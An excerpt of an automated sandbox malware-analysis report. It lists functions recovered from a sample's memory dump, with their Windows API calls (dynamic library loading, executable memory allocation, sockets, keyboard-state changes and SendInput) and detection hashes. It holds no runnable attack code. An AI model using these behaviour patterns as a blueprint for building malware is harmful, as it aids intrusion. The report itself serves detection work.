                                                  Function 00C690E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C68CF4,?,00C7F910), ref: 00C690EE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C69100
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 50767fc9921b6e43f3adb3bdc98e4f89c55900c49e0c8313c8338db8f5b5ad1d
                                                  • Instruction ID: dd890cc3406589752c81f8bb6f6fb765cdfb7773a432089b325d99d879ffec14
                                                  • Opcode Fuzzy Hash: 50767fc9921b6e43f3adb3bdc98e4f89c55900c49e0c8313c8338db8f5b5ad1d
                                                  • Instruction Fuzzy Hash: 50D01735510713CFDB209F71D8A870E76E8AF06395F22C83E949AD6590EA70C8C0CA90
                                                  Function 00C31714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  • Opcode ID: d3173d8d455b0741abcb1c600d02692d4a288eb88248727e0ff8ac679ebb04eb
                                                  • Instruction ID: e4691a1fd4801a3b275fe91d80d4d08938964af89d2ad1fe9e3466cd14f8018a
                                                  • Opcode Fuzzy Hash: d3173d8d455b0741abcb1c600d02692d4a288eb88248727e0ff8ac679ebb04eb
                                                  • Instruction Fuzzy Hash: 79D0177182810DFECB009A9298899FD77BCBB0A301F1C04A2B906E3040E6328B94EA21
                                                  Function 00C4717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76c964cc1b0bb5b7ac1495c5466d39f7950e6f8f75ca1d69070b9a25078dfef4
                                                  • Instruction ID: 1392b4e3104a1255364feba84833bfe411ad06248ea536ce6121b60abe59c700
                                                  • Opcode Fuzzy Hash: 76c964cc1b0bb5b7ac1495c5466d39f7950e6f8f75ca1d69070b9a25078dfef4
                                                  • Instruction Fuzzy Hash: 84C17175A04216EFCB14CFA4C884EAEBBB5FF48714B158698F815EB251D730EE81DB90
                                                  Function 00C6E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C6E0BE
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C6E101
                                                    • Part of subcall function 00C6D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6D7C5
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C6E301
                                                  • _memmove.LIBCMT ref: 00C6E314
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 5c4227a37962bb8018c5a43351cb41005ba009bde2d4201653c57a9341124835
                                                  • Instruction ID: abba8aa292f02b59264b6e1094cc8303bfa658b7a59879a1c3bd5122ae45050c
                                                  • Opcode Fuzzy Hash: 5c4227a37962bb8018c5a43351cb41005ba009bde2d4201653c57a9341124835
                                                  • Instruction Fuzzy Hash: 0BC188756083018FC724DF28C480A6ABBE4FF89314F14896EF9999B351D770EA46CF82
                                                  Function 00C68093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C680C3
                                                  • CoUninitialize.OLE32 ref: 00C680CE
                                                    • Part of subcall function 00C4D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4D5D4
                                                  • VariantInit.OLEAUT32(?), ref: 00C680D9
                                                  • VariantClear.OLEAUT32(?), ref: 00C683AA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: a8612e601a483fe2a9c253133a56d44862809d7285277932f01c5bc9cea9230b
                                                  • Instruction ID: 198ffdb651e043add7fd84efcba14cf5b9fa808a89414422c55bd03c42c9b2df
                                                  • Opcode Fuzzy Hash: a8612e601a483fe2a9c253133a56d44862809d7285277932f01c5bc9cea9230b
                                                  • Instruction Fuzzy Hash: 3AA169752047059FCB20DF25C491B2AB7E4BF89394F144558FA9A9B3A2CB30ED49CB82
                                                  Function 00C47530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C82C7C,?), ref: 00C476EA
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C82C7C,?), ref: 00C47702
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00C7FB80,000000FF,?,00000000,00000800,00000000,?,00C82C7C,?), ref: 00C47727
                                                  • _memcmp.LIBCMT ref: 00C47748
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: 4cbc848618c333f000b43efbe0daaf8d91e78acbb04c69df4e2f80a90c9dbbe0
                                                  • Instruction ID: 426f120d3440d33d9ba083c6ead96a7ad92eb1f6f9704a1519c08a302bd42740
                                                  • Opcode Fuzzy Hash: 4cbc848618c333f000b43efbe0daaf8d91e78acbb04c69df4e2f80a90c9dbbe0
                                                  • Instruction Fuzzy Hash: 58811B75A00109EFCB04DFA4C988EEEB7B9FF89315F204598F515AB250DB71AE46CB60
                                                  Function 00C4687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: 47f849e2a51d339e620dcf52e2554e2622947606fc6fcfa2df4f6256862d9136
                                                  • Instruction ID: 45512eb45dd2801aebce2937bda15931f5d5b44183230aef6081944c43ae955d
                                                  • Opcode Fuzzy Hash: 47f849e2a51d339e620dcf52e2554e2622947606fc6fcfa2df4f6256862d9136
                                                  • Instruction Fuzzy Hash: 6851C3747007019ADB24EF66D891B7EB3E5BF46310F20C81FE996EB295DB70D884A712
                                                  Function 00C5955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF4EE5: _fseek.LIBCMT ref: 00BF4EFD
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59824
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59837
                                                  • _free.LIBCMT ref: 00C596A2
                                                  • _free.LIBCMT ref: 00C596A9
                                                  • _free.LIBCMT ref: 00C59714
                                                    • Part of subcall function 00C12D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C19A24), ref: 00C12D69
                                                    • Part of subcall function 00C12D55: GetLastError.KERNEL32(00000000,?,00C19A24), ref: 00C12D7B
                                                  • _free.LIBCMT ref: 00C5971C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: 01e3ebb05d9156fe44a358a96b6ac6595ad6e39d2e799081a3dabc5bfc0fa677
                                                  • Instruction ID: 6ecd0f7f9bfa4d86954c03dd593281c36173377defb692570e2c8527ca184f6f
                                                  • Opcode Fuzzy Hash: 01e3ebb05d9156fe44a358a96b6ac6595ad6e39d2e799081a3dabc5bfc0fa677
                                                  • Instruction Fuzzy Hash: 3D514BB5904218EBDF249F64DC81AAEBBB9EF48300F1004DEF609A3241DB715A94DF58
                                                  Function 00C797F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(0156E480,?), ref: 00C79863
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00C79896
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C79903
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: e2b666eb112d36b62264a7b1fcd4dd35b273d2818278954bea839cbb2bcc5648
                                                  • Instruction ID: 46f4a81dc8267270b322154f2db76ff3558b7bef85eb1a58dc7d24d788aa0d31
                                                  • Opcode Fuzzy Hash: e2b666eb112d36b62264a7b1fcd4dd35b273d2818278954bea839cbb2bcc5648
                                                  • Instruction Fuzzy Hash: 6B512E34A00209AFDF14DF64D884AAE7BB5FF45360F14825DF9699B2A0D731AE81CB91
                                                  Function 00C49A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C49AD2
                                                  • __itow.LIBCMT ref: 00C49B03
                                                    • Part of subcall function 00C49D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C49DBE
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C49B6C
                                                  • __itow.LIBCMT ref: 00C49BC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: 9623b5ee669fa54ef24964db59147f33d701ee33885af85916f49de018bc6f66
                                                  • Instruction ID: 8c3aeea46ab842c3f279c8e30d06ccbba3e9b951f70054f0b6ef89cacb354cfb
                                                  • Opcode Fuzzy Hash: 9623b5ee669fa54ef24964db59147f33d701ee33885af85916f49de018bc6f66
                                                  • Instruction Fuzzy Hash: BE417F70A0021CABDF21EF64D845BFE7BB9EF45724F0000A9FA15A7291DB709A49CB61
                                                  Function 00C669AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00C669D1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C669E1
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C66A45
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C66A51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: 237456479aebf8b06e60506ed84cf02667d7db0a1cb6305df82eb9a3b4523203
                                                  • Instruction ID: bb505a762fa202d46bd1affea08e1505981f02c9b9b9a8bb8f3ae6e525028f2e
                                                  • Opcode Fuzzy Hash: 237456479aebf8b06e60506ed84cf02667d7db0a1cb6305df82eb9a3b4523203
                                                  • Instruction Fuzzy Hash: C34181756402046FEB60AF64CC86F3A77E49F05B54F0484ACFA69AB2D3DB709D058B91
                                                  Function 00C6641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C7F910), ref: 00C664A7
                                                  • _strlen.LIBCMT ref: 00C664D9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 9d9fd5f557c44d4e6782543fc9f00c44ad324fe0b7b21d7911e5c72fd77e5726
                                                  • Instruction ID: e153c7b10f8c9088ef13f3c94038ac852897355719d93295c7e563a1c9b6eb54
                                                  • Opcode Fuzzy Hash: 9d9fd5f557c44d4e6782543fc9f00c44ad324fe0b7b21d7911e5c72fd77e5726
                                                  • Instruction Fuzzy Hash: E141A731600108AFCB24EBA8DCD6FBEB7E9AF05314F148159F91A972D2DB30AE45DB51
                                                  Function 00C5B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C5B89E
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00C5B8C4
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C5B8E9
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C5B915
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: d6e720ce5c1cb59d74802ad4df06c58cb030723886092522b2d0bdeb65a90633
                                                  • Instruction ID: f79ec20d661901c63ac587545161bc5ad2d7c8306713bd0b6f9eb22fd2937d0f
                                                  • Opcode Fuzzy Hash: d6e720ce5c1cb59d74802ad4df06c58cb030723886092522b2d0bdeb65a90633
                                                  • Instruction Fuzzy Hash: 15411839600614DFCB10EF15C484B6DBBE1AF4A390F098098ED5A9B362CB30FD49DB95
                                                  Function 00C78851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C788DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 03df7cbceaf733c2c11e0736a99bc4327d33ef84f0465776af95511fa50ff9da
                                                  • Instruction ID: abf1a8c6b7698751678e3d300bc7168c423aec80e358f473ddb81f49db1ef0df
                                                  • Opcode Fuzzy Hash: 03df7cbceaf733c2c11e0736a99bc4327d33ef84f0465776af95511fa50ff9da
                                                  • Instruction Fuzzy Hash: E131C334680109BEEF219A69CC8DBBC77A5EB05350F94C111FB2DE61E1CE71DA489753
                                                  Function 00C7AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00C7AB60
                                                  • GetWindowRect.USER32(?,?), ref: 00C7ABD6
                                                  • PtInRect.USER32(?,?,00C7C014), ref: 00C7ABE6
                                                  • MessageBeep.USER32(00000000), ref: 00C7AC57
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 1f962c836217b49dfec2e3204c25caba7f7c755b0da90b01d3b32339c4d601d6
                                                  • Instruction ID: 60d5992e4d804038aa0ed6b422bba3dfdae2b4afca51ce9a09b43618c0607d6b
                                                  • Opcode Fuzzy Hash: 1f962c836217b49dfec2e3204c25caba7f7c755b0da90b01d3b32339c4d601d6
                                                  • Instruction Fuzzy Hash: 60415D30600119EFCB12DF58D884B6D7BF5FB89310F18C1A9E92D9B2A1D732A941DB92
                                                  Function 00C50AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C50B27
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C50B43
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C50BA9
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C50BFB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 45680a18894e5d02ee2483899dedfe622bae5837cd7955c009e6667348685cea
                                                  • Instruction ID: 9cc05b1d5067664bb5419e5d972ba3d59d6a5521a6152804c216f972c02f849c
                                                  • Opcode Fuzzy Hash: 45680a18894e5d02ee2483899dedfe622bae5837cd7955c009e6667348685cea
